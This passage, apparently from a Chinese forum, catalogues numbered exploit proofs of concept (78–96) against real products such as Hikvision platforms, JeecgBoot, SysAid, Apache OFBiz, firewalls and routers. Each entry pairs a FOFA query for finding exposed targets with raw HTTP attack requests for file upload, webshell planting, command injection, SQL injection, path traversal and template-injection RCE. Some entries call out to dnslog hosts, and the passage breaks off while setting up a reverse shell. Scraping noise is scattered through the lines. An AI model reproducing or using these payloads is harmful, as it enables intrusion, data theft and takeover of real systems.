* n- m( x4 C$ F. W8 f# s
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 \% d& @: [( k( {FOFA:icon_hash="2001627082". ?5 V8 p& }4 d" i& U
POST /Platform/System/FileUpload.ashx HTTP/1.1
( [( f& I! L7 H  fHost: x.x.x.x
: b! h( A( V! j4 |# MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 u( U8 [8 }  I2 i  t  _$ [; o; V
Connection: close' M. o# x' f" v7 S6 v  q
Content-Length: 336& N$ }7 }/ Q0 x7 E0 d7 ?
Accept-Encoding: gzip
+ P; O5 l+ \/ r  aContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
/ Y8 o7 e. N' `/ K4 Q( m. m& Z, m* Z$ S( b1 t; A' A9 C7 e
------YsOxWxSvj1KyZow1PTsh98fdu6l
' M; w, b: b7 ^5 d0 \Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
1 y: G$ f5 Y. J  m4 q8 b# q. mContent-Type: image/png
& _$ p  N0 V$ N, y) f  n5 z" W. v$ ^5 g8 z; r- |
YsOxWxSvj1KyZow1PTsh98fdu6l
, f* R. b0 k* j) y------YsOxWxSvj1KyZow1PTsh98fdu6l
; q4 e/ F; P# w0 R* {Content-Disposition: form-data; name="target"# N. y3 D  [7 j

7 E( B# f6 _! Q3 |/ E# ^/Applications/SkillDevelopAndEHS/
0 Y1 C) X# D$ q' R8 N. J------YsOxWxSvj1KyZow1PTsh98fdu6l--+ ?8 G% K1 T3 A) h( _0 z& e- y

* x0 U. t3 {$ u9 e, S3 a9 ]
: t* c: t% |' M$ p; t  RGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.15 p8 a, _% X- W4 ]0 W
Host: x.x.x.x! C8 S( p+ Q! V; t& B8 Y
$ r8 p5 d0 u7 J( P; T% r. H. ~

  i) f$ _0 R+ {# m: t  W( t79. BYTEVALUE 百为流控路由器远程命令执行( |5 L* T1 p7 A7 y( t5 c: ^
FOFA:BYTEVALUE 智能流控路由器
, D; J& ~6 o* P- jGET /goform/webRead/open/?path=|id HTTP/1.1
5 B6 I$ x3 P+ X) ?+ JHost:IP
0 s$ T) c+ q- i' `# E: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' g. C/ L) q8 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( I2 Y; v% B' sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' H! H: j9 O/ t: ^% |2 V
Accept-Encoding: gzip, deflate
9 W2 |5 L" f5 N8 A# nConnection: close
; M6 m, e% A6 B8 E# T& qUpgrade-Insecure-Requests: 1
0 }0 L6 u1 Y, p$ p: S. r  h( N" R; h
% x& Y* X5 a- p, K! M9 j# S9 U5 c
$ _" E- F* B1 w& J2 z2 I80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
2 a/ h. R# ~7 E; y  J+ \FOFA:app="速达软件-公司产品"6 G/ {7 l+ I, c" ~0 }. ^  I
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1# ^# ]8 o8 M% b' L; r, b
Host: x.x.x.x7 M/ A+ J" h4 t. w! u2 l$ \, ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" i$ P0 {  m0 e! n/ lContent-Length: 27$ t0 e2 ^# y; ?- Y0 n! h4 F5 }; `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# ^0 k3 \  p: j& MAccept-Encoding: gzip, deflate$ f6 u6 d0 [3 d% l  j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* Y- O8 t  {. ?. M% o  |8 r
Connection: close3 A( ?+ R4 [! X. i" A1 F  |
Content-Type: application/octet-stream3 f/ z  {8 i- R7 [
Upgrade-Insecure-Requests: 1
6 x- t& l5 L" B+ R% r) ~) F. c: D- f+ \( s( v( E, q
<% out.print("oessqeonylzaf");%>
! R/ S3 Q0 D# B" k/ X3 c+ ]; p8 e1 d. ?
/ a! J3 q1 r- D% {
GET /xykqmfxpoas.jsp HTTP/1.1
( ]) E4 j2 U5 z' jHost: x.x.x.x  I& M& s' Z% U! a7 C8 n$ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! ?. D8 A. K& ]: `. l  f) T! bConnection: close; U3 r, Y1 [5 L
Accept-Encoding: gzip1 a( ?# C' T7 L* F* U  M. i

; N2 Y" d7 s& p5 O' w4 \5 y" v8 e
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 p! V5 w0 T5 p+ z
FOFA:app="uniview-视频监控"
( W) ~: o5 M# KGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1- S; M5 l3 w! [1 Y3 a" H4 [, z
Host: x.x.x.x
9 z# O2 j7 F" c- J. P: D" @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, s+ O9 U' M- _+ e% _0 vConnection: close7 e' s$ K- g4 X( Y8 i
Accept-Encoding: gzip
4 L3 C& X, k" X7 c0 G$ a) q
( r6 j/ w8 \' l9 T3 t
4 R+ K6 F4 d$ k& s7 S' T82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行! q  u# h3 m/ I% z# w2 @
FOFA:app="思福迪-LOGBASE"# ~6 g9 e1 ?  V, p) \
POST /bhost/test_qrcode_b HTTP/1.1' L3 {) S9 V; z! O& G  E
Host: BaseURL4 `1 o$ {  g" R% H) [" m- c
User-Agent: Go-http-client/1.16 }) M/ ]% h; Q/ a& @3 `
Content-Length: 23
' f1 B/ N5 K  ^" @0 aAccept-Encoding: gzip: N5 a7 O1 N+ |; i1 ]
Connection: close1 v8 A# X3 Z1 B/ e7 r
Content-Type: application/x-www-form-urlencoded$ [1 h4 @( r" e1 c6 w# U6 `9 z
Referer: BaseURL
0 C1 \( ]1 u" z) l8 f9 M2 P4 q+ W
  b8 _2 }7 E4 Wz1=1&z2="|id;"&z3=bhost
. Y. d* t0 E0 B7 K) e$ [4 |$ M
( o0 \5 K3 L! z: K9 v$ n+ E5 x- M
4 c  C* b9 x% f5 G8 {" w83. JeecgBoot testConnection 远程命令执行
7 s6 S- U9 d% RFOFA:title=="JeecgBoot 企业级低代码平台"
  {+ U1 M% i% Z$ E" b  @; x. O; ^  B+ v0 G2 b9 w
" H5 r3 z9 l3 R/ [6 p
POST /jmreport/testConnection HTTP/1.13 a$ Q- f0 y8 u  a6 ^. Y
Host: x.x.x.x# x6 b5 s# ~/ R( ?* g. T$ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  h0 y! D( l9 U; Y" O+ q, h
Connection: close
" o5 x. o" N0 U6 G7 b1 m8 h& A; ?Content-Length: 8881
! [* [! O/ o$ _4 W) }5 W& vAccept-Encoding: gzip) Y- c* K1 W; \% B
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"$ U  i7 Q: [7 r9 h! }* }. x
Content-Type: application/json) O# M2 {; e+ ]4 N- Y" {$ x

1 f3 x! H4 e& @5 e0 x: tPAYLOAD
# F5 {- `# i# B  R- l: `$ t9 ?
" i$ ^9 X" _4 r$ T4 [/ B) }84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- Y- W0 {) z  S5 `: Z$ W' CFOFA:title=="JeecgBoot 企业级低代码平台"+ q: ~  g1 Z& }' h0 j$ f3 H

! [1 `/ n( ?5 S8 G3 X) e
: k% X1 l0 I3 ^2 _/ a. X9 D; _5 Q+ P5 q0 d$ J* s  R; _
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
; w8 L! }, K& q8 y* w* [Host: 192.168.40.130:8080
( Q, M4 A+ L+ w! D  [! L  lUser-Agent: curl/7.88.1
. s3 X! |6 @. ~3 ]/ N( {Content-Length: 156- o: y4 m+ z% I0 X9 s
Accept: */*
4 m6 ~6 ?' S3 H  t& k* YConnection: close+ @$ k/ I% t- @% C
Content-Type: application/json
' o" p5 b" s$ ^6 Q' k) |Accept-Encoding: gzip
+ a4 p0 p- l- M' n4 c
& W8 Z% G6 w$ M9 d+ l" R8 l+ e, E  S- c0 W{
" P" n8 H4 g, S "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
+ p; N$ a) x, u/ M5 ]! c: W  "type": "0"
5 f: x7 _+ Y3 \5 \3 M- [6 \. O}+ R+ F3 Z8 O  @: ~- D; m2 Y1 o

/ v. G# E7 O: f8 N7 ^  X+ P% |4 s6 F0 `% w- Z
85. SysAid On-premise< 23.3.36远程代码执行+ E3 V4 l/ ~) V5 g7 z
CVE-2023-472463 |$ @4 U1 R$ P9 @8 T5 t: {
FOFA:body="sysaid-logo-dark-green.png"
5 I* F5 \" w5 `& j1 g! U5 \4 X6 FEXP数据包如下,注入哥斯拉马
# p& ~# U, g; D4 g5 L  _4 o! j4 B) dPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
7 v& V+ E2 y3 Y; I/ v8 U* z+ m# MHost: x.x.x.x
8 q' p4 a/ b4 T- DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: J1 t# n2 b9 }) [' qContent-Type: application/octet-stream* y$ p! `; N- P% s3 v5 X
Accept-Encoding: gzip9 g6 l4 M8 f: G! m

! r  ~/ M! Z- H0 T; s8 ^: VPAYLOAD
- t, ~7 H- B' Z' x6 f, F3 ~2 l( |7 ]/ R
9 M+ B( ?2 H9 ]0 Y$ p' _回显URL:http://x.x.x.x/userfiles/index.jsp0 [) }1 x5 K# x; t& L, ]

8 B. m( C1 h) N  j- c# T86. 日本tosei自助洗衣机RCE* H; S) n9 e) [- A& n1 u0 N4 {( Z
FOFA:body="tosei_login_check.php"5 ]" ~) H, U+ K% u
POST /cgi-bin/network_test.php HTTP/1.1
, A0 N3 r; d2 P- Y: M0 cHost: x.x.x.x
; k% y4 C  ?. Z' ?) N! jUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36& {$ w, J8 ^# x4 @4 J
Connection: close. |: V; p" J/ F6 o% k& ?
Content-Length: 44
0 j3 c" u* x/ b& xAccept: */*; D& ]# ~; Y& S) {
Accept-Encoding: gzip
6 Q2 i  G- e; A- D7 s: i$ EAccept-Language: en
4 c* u/ `. R/ A4 A& K+ S6 \Content-Type: application/x-www-form-urlencoded. x& y" \8 b" P. U/ m1 l
, H- f3 s# H8 t* |% h4 @/ n" x
host=%0acat${IFS}/etc/passwd%0a&command=ping
  e5 F7 N" r3 i, l5 h0 K
5 M1 |' X3 l! }3 A) M8 S5 d- |0 ]; `9 Z: @
87. 安恒明御安全网关aaa_local_web_preview文件上传0 y" F1 ~+ `% l: [7 Z3 d
FOFA:title="明御安全网关"' C5 U; K: n$ ^5 W1 J3 e5 ~1 H
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
' j+ a1 q4 l* i; U. ?. ^) VHost: X.X.X.X
6 V/ m. e  Y4 k5 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ f9 R8 P4 L" f
Connection: close4 z( G  F0 x7 g. W4 M  N
Content-Length: 198
3 M. M8 f: ]* |* _1 yAccept-Encoding: gzip9 E  U1 b# b1 o! k! S
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
  l2 K, h3 N, E+ i  c1 d! C+ d: ~( q) G5 b' @# M
--qqobiandqgawlxodfiisporjwravxtvd# z' W, z  r( K9 P  G. F
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"% o. b, \; i& T/ _% U/ F! F
Content-Type: text/plain
9 E/ C( E7 R" O) A6 L8 G
  }/ \* C& K9 Z6 f2 p2 `$ @2ZqGNnsjzzU2GBBPyd8AIA7QlDq
2 E, s: |! l+ A2 n, f4 g% |; y--qqobiandqgawlxodfiisporjwravxtvd--: F  f$ d) B, Q/ Z+ X' }
$ b, P2 I- u8 {% Q

5 v/ p; c; n7 p1 G3 V/jfhatuwe.php* A. g' A3 z6 |7 C+ q  P! U

) u2 n8 T7 Y6 W1 b5 g+ {5 D88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行" K& _, ~. R0 B  B, v
FOFA:title="明御安全网关"( ?* ^. Z* k6 |# v; d3 a. J& o' Z
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.17 {# D2 U; b+ T! M
Host: x.x.x.xx.x.x.x6 o: ~3 a/ M- F! g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! |6 M9 l8 j$ }6 b0 x+ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  p) D  p1 k6 u1 l. z
Accept-Encoding: gzip, deflate0 O$ J1 d4 v6 `7 F* `  @% E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ [+ k" s! c* `0 X7 ~Connection: close
# Y- s# f3 d+ P# p8 B- Y
: N* l' f" w& ]) P2 [; l  K2 U4 b( B" O* s  n' Z* ~  }
/astdfkhl.php
9 _& V% ^# v% B  h+ N* F2 A0 ~: J( h/ v8 l
89. 致远互联FE协作办公平台editflow_manager存在sql注入
6 h+ [5 d9 ]( A0 I, LFOFA:title="FE协作办公平台" || body="li_plugins_download"
2 l3 s! L" x2 _9 g. pPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
7 l" O" K+ K4 m/ S' B: H" AHost: x.x.x.x
: N! R* v1 b& b, N# ^! ?! w/ }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! D- {2 ~! X+ T& `8 i
Connection: close
7 l1 ]6 y. k  g/ jContent-Length: 41) F* ^- n2 ]6 e" U, r
Content-Type: application/x-www-form-urlencoded
& h' ~" ^8 q2 c. `0 PAccept-Encoding: gzip
4 n! A1 C  [: `: W) M3 D/ `' o9 h5 K2 K+ E4 N! M9 O
option=2&GUID=-1'+union+select+111*222--+3 f( C  m( `* x1 i( a+ U2 g
# p) z0 M  l! t7 s" Q
  g; E& v  v( Y- c" B+ x  D
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行  _: v, R& i% k+ r6 W' V
FOFA:icon_hash="-1830859634"
* U, @3 i5 X6 WPOST /php/ping.php HTTP/1.1
, A( M( t" p4 R! ~2 U, {: X. nHost: x.x.x.x! a5 z: I0 g3 a6 r# a: D4 A$ K& ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 F& ~) M. M+ l7 K
Content-Length: 51  u: @8 }/ L1 ^' Z- V4 @
Accept: application/json, text/javascript, */*; q=0.015 K; z5 y; F6 q& z
Accept-Encoding: gzip, deflate3 |+ ~  j8 a4 B$ G/ {$ ~" n$ c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 {" k: I" f% b! W  _, P4 d0 {9 X
Connection: close! x3 ^" v% A8 k0 F( u: X& [, T, @; ~
Content-Type: application/x-www-form-urlencoded7 g0 Q" m; k! b$ y9 {) B! u0 J
X-Requested-With: XMLHttpRequest' k& T  h+ L+ ?# H( G
1 r5 G- U" P: d  X1 y# h1 j
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig' u. s  s5 }  d6 v3 C8 A- N( ?
: t# R% z/ w+ b3 s- D- W

- H$ I" Z+ ~7 \& n6 Y* Z91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
8 D8 a; E. V/ A' O+ x5 ZFOFA:title="综合安防管理平台"+ U1 c& o* j9 k/ b) G: h
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
2 n& l, f! J, }% q3 r' ZHost: your-ip
- M, a$ p0 k' Y* ]8 K$ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# }& r4 u# c& Q( ~! a1 J$ l
Accept-Encoding: gzip, deflate
5 N1 W5 I8 T: CAccept: */*
# p, ~/ u( R/ ^. Q8 U" i: b; iConnection: keep-alive6 k  o& m* S( `: U7 l; k3 s& k4 m: W

/ G& i7 a3 M) t  y+ c/ n
8 R0 G# P# u# U6 g( }" ?
) t8 W, J- X" N" n3 |92. 海康威视运行管理中心session命令执行. M! p2 ?. d1 W+ M2 v5 o
Fastjson命令执行% W7 [- [  m- d9 t
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"" B1 \7 b1 a8 N% \; i* r+ N% w1 ]
POST /center/api/session HTTP/1.16 B' r4 D6 q- o' V; e. a1 o
Host:6 }7 Q. X( ?* b# d
Accept: application/json, text/plain, */*
' Y+ F4 g) U7 o+ W* ]Accept-Encoding: gzip, deflate% H6 S8 ]0 |) j! o' R0 o
X-Requested-With: XMLHttpRequest8 t* M& Y8 ?1 j& H$ L4 H! p
Content-Type: application/json;charset=UTF-89 S3 o8 O; ]" ?  n; |9 Y0 R
X-Language-Type: zh_CN
' j1 \7 ?  o+ x+ j8 Y" F5 l! nTestcmd: echo test
, w  I+ D9 U& K, hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36/ y/ F. a& @9 Y7 V0 @. l3 E! @
Accept-Language: zh-CN,zh;q=0.98 I2 j3 B  v+ {2 s$ z& }) A* i
Content-Length: 57780 g/ P/ D3 X7 }$ P
( c4 p* O6 y5 k: a; o
PAYLOAD& g. |. K' W/ V" n4 K* a" c
, \6 S* J6 l' A7 f! k. w/ ~
' E3 I3 e8 C3 u
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传# P5 S0 @4 ~( {! h
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
1 B+ `" ~+ B% A" s# C: x& APOST /?g=app_av_import_save HTTP/1.10 Q5 @5 B! j! B2 T" H
Host: x.x.x.x
) F. D  C! d# TContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
7 M; N- v  W( b, f0 D* P5 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; H: r' M0 v7 A, `! |4 o3 x
$ Z$ W: |! V2 i0 v( [2 u9 S2 Y; r
------WebKitFormBoundarykcbkgdfx/ j" l; l5 ]3 A6 B
Content-Disposition: form-data; name="MAX_FILE_SIZE"5 U/ b2 d. w- b2 u* Q
( J8 ]0 b% c' H6 m5 i( [% `9 G6 Q
10000000
+ s( ]7 |' y; q) e------WebKitFormBoundarykcbkgdfx1 h& `: r' b, h4 i
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"; B' l& @2 z; c5 c# v( c
Content-Type: text/plain  O' j, R, r. c/ J3 f4 W3 E, ^" v

: b( m, L" {5 a. G/ kwagletqrkwrddkthtulxsqrphulnknxa2 m9 G% X5 H( I- N- u; N7 z
------WebKitFormBoundarykcbkgdfx9 E, T+ O+ \6 }( |+ V
Content-Disposition: form-data; name="submit_post"- Z! a8 W$ L  [1 U
  x5 v3 M- M( A: }& Z# u8 J
obj_app_upfile% f, _5 J# ^! A9 F
------WebKitFormBoundarykcbkgdfx. ^5 `9 C1 l7 u
Content-Disposition: form-data; name="__hash__"* a/ Q* q* S! U- h) |* c" i

; m: T- R- E: s( y% m3 S3 ?0b9d6b1ab7479ab69d9f71b05e0e9445
. M/ S* R+ i$ z9 d" e------WebKitFormBoundarykcbkgdfx--
6 S6 m2 F# m; |& N$ G
& v3 ]4 T! t" a9 Z' a  \- i  G' ?  L7 H: c( c2 v! `
GET /attachements/xlskxknxa.txt HTTP/1.10 }# G/ a) g( m! r. m# o
Host: xx.xx.xx.xx
, H4 t' ]; g# iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. Q1 E8 m! c' I/ p6 n% }1 U
# F' C0 h2 ]& N( }" v+ _! f% [3 x( h
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: U" `9 u; a9 g; I# jFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ c* X' H  I- q8 \( A
POST /?g=obj_area_import_save HTTP/1.1. L# O1 V6 p9 \9 D$ H+ T
Host: x.x.x.x
3 _; Y' W. q) \; u3 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; D( K" u. E1 m2 \" M# F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& g0 X- f# w2 v9 ~- x! S" J# u6 j# N/ X8 I
------WebKitFormBoundarybqvzqvmt
) u6 H& t/ a# U' d& d; ~6 uContent-Disposition: form-data; name="MAX_FILE_SIZE"; g5 j, q6 i% ~# Y

) w1 @4 S6 \! d2 r6 w4 ]3 ^10000000
3 i2 b( {2 }* ^( i, ^: F------WebKitFormBoundarybqvzqvmt
6 N6 S  T! O+ J1 W9 QContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"( Z: R; X4 p1 ~! a+ K8 B4 }
Content-Type: text/plain2 ~$ D* O& H4 K8 |
) |8 E. N; D8 M" x
pxplitttsrjnyoafavcajwkvhxindhmu
' U& e- X) S  g5 I6 n$ i6 p------WebKitFormBoundarybqvzqvmt
, j; E5 z8 \* ?4 nContent-Disposition: form-data; name="submit_post"
& q: }5 @/ J  }( V7 ?) Z9 x; J4 F7 Q* _9 j
obj_app_upfile
# \" @: N7 A* T$ x" I: U) \" b( S& G------WebKitFormBoundarybqvzqvmt  X) i2 F8 B" y: J3 E
Content-Disposition: form-data; name="__hash__"
3 g* |5 b* S  ]/ C- E4 ?4 }2 s; ?/ i. I2 N; ]8 E" _4 w- K' ~7 F
0b9d6b1ab7479ab69d9f71b05e0e9445& s4 m) b6 B* L# w- B
------WebKitFormBoundarybqvzqvmt--% B& l6 p8 `; r& m: `7 f( d

" k8 f! f' L: Z- ]
9 V3 e9 I* a! s" g" i7 m* w' P& {( H. Y/ c& z2 a/ v! |
GET /attachements/xlskxknxa.txt HTTP/1.1
$ I8 e2 N. z) Y: y- ~. `6 x- ^Host: xx.xx.xx.xx
% u* X6 z" f+ V- }User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" i4 @: K# `$ D; w  B# Y) K9 Y( d: Y$ r4 Z: |
  h- X, F  c, r, i  n% o
6 N2 q: D" Z4 q( `
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行9 _5 t) J- M) v5 |
CVE-2023-49070- T- o% g$ @$ e5 i# H
FOFA:app="Apache_OFBiz"
1 `1 R  J& d5 a6 N3 o3 zPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
- N' F1 P7 W$ h/ _6 `) zHost: x.x.x.x" R1 d' }+ @6 ?2 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, w" L% D1 R% z6 O' W4 E+ HConnection: close
* ~: m) }- c; d' fContent-Length: 8894 n5 `% e. U  G- Q! y. ~8 M* K
Content-Type: application/xml
  m6 r* ?. Z5 H) E7 m: pAccept-Encoding: gzip5 c2 f6 o( Z1 F. D9 F
9 |3 x! x6 @8 F* d1 y0 O$ K3 X
<?xml version="1.0"?>  V2 X. x* A1 r2 ^
<methodCall>9 k3 f9 X9 |& K- J
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>* O0 l# [) i6 j1 Z2 B
    <params>( b4 d4 v3 N! k) V, k/ y
      <param>' `! o5 d. |# u8 E* d2 N
      <value>$ L' v# o( b6 S( i) j4 @
        <struct>
5 x" {2 s6 t6 S. [6 h6 \& O1 F       <member>+ f& q! R  M; l' q3 z- I, Q
          <name>test</name>0 I6 B/ A2 _. Y1 `
          <value>- o5 |' ^2 v+ N" S% b% F7 t( Y: o1 u
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>: P: J. [6 p5 P( p( j  y
          </value>5 p$ f! ^' Y7 ?: y  x) b
        </member>
) o* r9 {8 m4 @      </struct>4 X& q6 S; K; i
      </value>
+ b$ V3 j: c  J    </param>
! A# Y$ f8 ?& x( Z    </params>
6 L- [$ S/ q% D</methodCall>0 D1 s! G8 O/ A
; V- T7 i6 b4 _' w/ l

9 ^2 I) h4 ?- t% z- u( U用ysoserial生成payload4 N' o8 J& Z, |% a  X) K7 M1 g5 e
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
; m' T, q. m. @3 K2 p8 Z0 i1 Z6 m4 G- e, X% o1 e

3 t8 s- ?; O! [% U) l) T* m将生成的payload替换到上面的POC
8 q4 i5 o+ k- n1 U+ `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
' N5 \+ {) t2 T, q& O! EHost: 192.168.40.130:8443
  v; i( q% ]) I5 BUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 p6 [2 U: I& f  z+ [. u- \9 N' Z! LConnection: close
$ Q# c( i" K$ ]2 @2 r4 @Content-Length: 889
+ y  n. _* i- I9 s( N  KContent-Type: application/xml
, l. z0 B$ t' s' TAccept-Encoding: gzip# z& c+ {$ w2 C1 D

# c& D$ ?$ n& ~9 ^( V; W$ APAYLOAD% s$ c8 c: L; N7 q. {8 m$ A

& U- C9 M7 C* i3 \1 r7 O: U96. Apache OFBiz  18.12.11 groovy 远程代码执行' e8 U, D2 K7 @8 s
FOFA:app="Apache_OFBiz"
4 u( [0 R. B3 J& k) e8 _. F/ A1 @* gPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
7 x' M5 W& ?. s9 I, X5 m' IHost: localhost:84438 F% u, e$ `( x( X* G& V3 y) h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 M! }7 y" r9 Q8 T+ ]5 uAccept: */*
- S) t8 Y2 _6 I* H! B4 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Z+ h$ p3 o+ X7 l& }# k' A
Content-Type: application/x-www-form-urlencoded
% T* H0 V% x2 l9 P& u$ y' \) FContent-Length: 55& e. {* m: q6 p

! S- N2 M+ W, zgroovyProgram=throw+new+Exception('id'.execute().text);* x* w# h" i: ], Z: W

- }3 P& g3 B& _" t! }; J, L# |: C7 x/ G9 X5 \/ ~
反弹shell
, R; z2 X" h- z8 U% K7 [2 b在kali上启动一个监听
" O; V* D  l+ G: ]' |nc -lvp 7777
6 ~" E  q* z$ f# ^$ A) e# |8 Z
  Y) M; F: X0 P5 B* C+ S& k1 HPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
9 t6 V0 ~! H5 c  ]  MHost: 192.168.40.130:8443
2 P" e$ j8 [: _3 h. ~* H, g! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ f$ t/ u2 {# A+ H7 L0 }Accept: */*
% R& m% b7 }9 r( v% ^: UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- H; D3 x; P2 C% [9 }% z; w4 D
Content-Type: application/x-www-form-urlencoded( N" J0 D& B/ V3 H
Content-Length: 71
8 f- ?& |& M! S" F. J7 |! e% Z# e4 `8 U
